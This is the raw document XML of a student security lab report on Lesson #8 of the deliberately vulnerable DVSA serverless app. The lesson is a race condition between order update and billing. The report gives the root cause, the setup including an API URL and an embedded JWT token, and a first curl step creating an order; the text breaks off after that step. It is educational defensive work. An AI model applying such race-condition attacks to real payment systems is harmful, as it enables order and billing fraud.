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544459" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFA5ED1" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C80787" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67581ECC" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CEC829" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467776F4" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRPr="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730F3EA2" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E13FC43" w14:textId="73147667" w:rsidR="005C76E2" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>ICS-344</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D0CB2" w14:textId="2FEFD8D9" w:rsidR="00F24FB8" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C933E8" w14:textId="68E186E3" w:rsidR="00F24FB8" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Your DVSA Website </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="002B69BC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>URL:</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1458AC3E" w14:textId="5589D563" w:rsidR="00E80AF1" w:rsidRDefault="00E80AF1" w:rsidP="00E80AF1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00D47BE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>http://dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/orders</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3BA613" w14:textId="755178DC" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="0043049B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>AWS Region</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0043049B" w:rsidRPr="0043049B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0043049B" w:rsidRPr="0043049B">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
      <w:r w:rsidR="0043049B">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>(N. Virginia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1A2F6" w14:textId="1D497218" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>19 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9714E" w14:textId="615B9669" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Vulnerability Title(s):</w:t>
      </w:r>
      <w:r w:rsidR="00916481" w:rsidRPr="00916481">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00916481" w:rsidRPr="00916481">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Logic Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507680AE" w14:textId="45602218" w:rsidR="00142AD2" w:rsidRDefault="00142AD2" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Lesson - #</w:t>
      </w:r>
      <w:r w:rsidR="00370E8C">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA9F9A" w14:textId="6E176124" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F68C1B" w14:textId="7ED3285E" w:rsidR="00F24FB8" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CD5CE" w14:textId="4C00E37D" w:rsidR="00BA72A1" w:rsidRDefault="00E80AF1" w:rsidP="009425DA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E80AF1">
        <w:t>The goal of Lesson #8 is to demonstrate a logic vulnerability caused by a race condition in the DVSA order workflow. In the normal design, an order should move through a controlled sequence: creation, update if still open, billing, then transition to paid. The backend should not allow conflicting operations to modify the same order at the same time. In DVSA, however, concurrent update and billing requests can interact with the same order in a timing-sensitive way, which shows weak server-side workflow protection before remediation. This matches the project description of Lesson #8 as a race-condition-based logic flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18516498" w14:textId="3122E45C" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Why This Works / Root Caus</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582227" w14:textId="6D6A5174" w:rsidR="00BA72A1" w:rsidRDefault="001B1985" w:rsidP="001B1985">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001B1985">
        <w:t>This works because the order workflow originally did not enforce strict state transitions strongly enough during concurrent operations. Before the fix, update and billing could both be processed in close timing against the same order. The protection logic only became visible after the order state had already advanced, returning messages such as order already paid and order already made. That means the backend was reacting too late, instead of preventing the conflicting workflow transition at the start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E490550" w14:textId="77927C31" w:rsidR="0043049B" w:rsidRDefault="0043049B" w:rsidP="0043049B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Root cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D9504" w14:textId="77777777" w:rsidR="0043049B" w:rsidRDefault="0043049B" w:rsidP="0043049B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>weak workflow/state validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2ABB2F" w14:textId="77777777" w:rsidR="0043049B" w:rsidRDefault="0043049B" w:rsidP="0043049B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>insufficient locking / conditional state enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015BAFF4" w14:textId="77777777" w:rsidR="0043049B" w:rsidRDefault="0043049B" w:rsidP="0043049B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>timing-sensitive handling of billing and update requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29E675" w14:textId="3579C7C2" w:rsidR="0043049B" w:rsidRDefault="0043049B" w:rsidP="0043049B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> change checks happening after progression rather than before it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63819883" w14:textId="7E53F04B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Environment and Setu</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34873F3B" w14:textId="55F2090E" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Environment used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439190E7" w14:textId="77777777" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>AWS region: us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270B8EC" w14:textId="77777777" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>DVSA deployed on AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797308C0" w14:textId="77777777" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>API endpoint from API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23B7D8" w14:textId="77777777" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux terminal with curl and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E50AA50" w14:textId="77777777" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>valid JWT token from DVSA login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2BEE4" w14:textId="77777777" w:rsidR="00E025EC" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>AWS CloudWatch for logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50C82D" w14:textId="2982062C" w:rsidR="00BA72A1" w:rsidRDefault="00E025EC" w:rsidP="00E025EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>DVSA frontend for optional order view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ECFD16" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CB2287" w14:textId="77777777" w:rsidR="00E10DDC" w:rsidRDefault="00E10DDC" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7407F9B0" w14:textId="77777777" w:rsidR="00E10DDC" w:rsidRDefault="00E10DDC" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1205B6DE" w14:textId="77777777" w:rsidR="00E10DDC" w:rsidRDefault="00E10DDC" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75299E66" w14:textId="77777777" w:rsidR="00E10DDC" w:rsidRDefault="00E10DDC" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0396643A" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:lastRenderedPageBreak/>
        <w:t>AWS services involved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8FA72A" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">: receives /order requests </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CC28A" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FD82A" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">DVSA-ORDER-MANAGER </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664874A" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">DVSA-ORDER-UPDATE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A71F64" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">DVSA-ORDER-BILLING </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6BFC64" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DynamoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">: stores order state and item list </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE89F5" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRPr="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQS</w:t>
      </w:r>
      <w:r w:rsidRPr="00292A6C">
        <w:t xml:space="preserve">: used by billing after successful payment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1C352" w14:textId="77777777" w:rsidR="00292A6C" w:rsidRDefault="00292A6C" w:rsidP="00292A6C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00292A6C">
        <w:t>Exported variables used in Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B761C5" w14:textId="65A3DD79" w:rsidR="00971A1B" w:rsidRDefault="00971A1B" w:rsidP="00FC2750">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>export API="https://h3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACBB72" w14:textId="662E7C2F" w:rsidR="00971A1B" w:rsidRDefault="00971A1B" w:rsidP="00971A1B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>export TOKEN_B="eyJraWQiOiJPQkJnV0llaFByYmVLV0orenZ2XC9PRURzeGpyNmJZSERsck1LNzVwU0lOWT0iLCJhbGciOiJSUzI1NiJ9.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.cm-iOTCCW3CM_Y4DcVRkicqzjQcOBqZ3enlKWuzOoF8e_xMYHJnepXZR68E9KUa1ac3I5tRtQLoCIgIl66Lh2YtJqM2reoH8E6AM7T_-YgghRzw_N3vaj5ZIhN2qxShLim_DuHzvB20mVvHXbaUNt8gbtMEEB2QenptqZ3yBhn1PoO0MCQEleQsKv6RvHZoXRx13eGK_NP-87VF5VKujzgNSfhnDMw8yrZxk6-BJ5fFv_SCr8f4cfLibWTs9ShFuUkOZobe31NEHhsW62cFrATU3mmQuRddVaCk58FZ6veGnGbT34eXVxV4Cmfk5pEKQgyhhNfiWokYa6K-G3PAFyg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751CEA29" w14:textId="71502B24" w:rsidR="00BA72A1" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C00F386" w14:textId="08D3D205" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB655A" w14:textId="4A17A249" w:rsidR="00BA72A1" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25B37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Create a fresh order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50D466" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F100E8" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "content-type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC926E" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03DCC2" w14:textId="754A711B" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--data-raw '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>action":"new","cart-id":"race-test","items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">":{"1":1}}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28FBE11E" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006A7EC2" w14:textId="67AA7888" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25B37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observed result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7FF983" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRPr="008E7FAA" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7FAA">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5794075B" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRPr="008E7FAA" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7FAA">
        <w:t xml:space="preserve">  "status": "ok",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB160F" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRPr="008E7FAA" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7FAA">
        <w:t xml:space="preserve">  "msg": "order created",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA1BC9" w14:textId="77777777" w:rsidR="00C25B37" w:rsidRPr="008E7FAA" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7FAA">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E7FAA">
        <w:t>order</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E7FAA">
        <w:t>-id": "18920727-7ee0-4b42-a601-bfe8f8b3b568"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9A358" w14:textId="63C8BBCB" w:rsidR="00C25B37" w:rsidRPr="008E7FAA" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7FAA">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E24C35" w14:textId="06C67914" w:rsidR="00C25B37" w:rsidRDefault="00C25B37" w:rsidP="00C25B37">
